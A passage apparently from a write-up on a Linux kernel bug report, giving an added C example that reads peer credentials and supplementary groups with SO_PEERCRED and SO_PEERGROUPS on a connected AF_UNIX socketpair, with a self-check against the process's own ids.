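The report notes that SO_PEERGROUPS is normally only used on a socket returned by accept(), where the peer cannot swap the socket's creds out from under the caller. The following is an added example, not code from the bug report or from the kernel, showing that normal usage on a connected AF_UNIX socket (a socketpair() here, which the kernel initialises the same way as an accept()ed connection), including the ERANGE size-probing step SO_PEERGROUPS requires; it assumes Linux with glibc headers, and the SO_PEERGROUPS fallback value is the asm-generic one for older headers.

```c
/* Added example (not the bug report's code): reading peer credentials on a
 * connected AF_UNIX socket, the race-free usage the report contrasts with
 * its listening-socket testcase. Assumes Linux and glibc headers. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef SO_PEERGROUPS
#define SO_PEERGROUPS 59  /* asm-generic/socket.h value, for older libc headers */
#endif

/* Peer pid/euid/egid as seen from our namespaces. 0 on success, -1 + errno. */
int peer_cred(int fd, struct ucred *out) {
    socklen_t len = sizeof(*out);
    if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, out, &len) != 0)
        return -1;
    if (len != sizeof(*out)) {  /* never trust a partially filled struct */
        errno = EINVAL;
        return -1;
    }
    return 0;
}

/* Peer supplementary groups. The kernel rejects a short buffer with ERANGE
 * and stores the needed size in optlen, so probe with a zero-length buffer
 * first and allocate exactly that. Returns the group count with a malloc'ed
 * array in *out (NULL when the count is 0); -1 with errno set on error. */
int peer_groups(int fd, gid_t **out) {
    socklen_t len = 0;
    *out = NULL;
    if (getsockopt(fd, SOL_SOCKET, SO_PEERGROUPS, NULL, &len) == 0)
        return 0;  /* peer has no supplementary groups */
    if (errno != ERANGE)
        return -1;
    gid_t *buf = malloc(len);
    if (buf == NULL)
        return -1;
    if (getsockopt(fd, SOL_SOCKET, SO_PEERGROUPS, buf, &len) != 0) {
        int saved = errno;
        free(buf);
        errno = saved;
        return -1;
    }
    *out = buf;
    return (int)(len / sizeof(gid_t));
}

/* Self-check: on a socketpair() the peer is this very process, so the
 * reported ids must equal our own. Returns 1 on agreement, 0 otherwise.
 * A kernel or sandbox without SO_PEERGROUPS (ENOPROTOOPT) skips only the
 * group comparison. */
int peer_cred_selfcheck(void) {
    int fds[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, fds) != 0)
        return 0;
    struct ucred uc;
    gid_t *groups = NULL;
    int ok = 0;
    if (peer_cred(fds[0], &uc) == 0 && uc.pid == getpid() &&
        uc.uid == geteuid() && uc.gid == getegid()) {
        int n = peer_groups(fds[0], &groups);
        ok = (n >= 0) ? (n == getgroups(0, NULL)) : (errno == ENOPROTOOPT);
    }
    free(groups);
    close(fds[0]);
    close(fds[1]);
    return ok;
}

int main(void) {
    printf("peer credential self-check %s\n",
           peer_cred_selfcheck() ? "passed" : "FAILED");
    return 0;
}
```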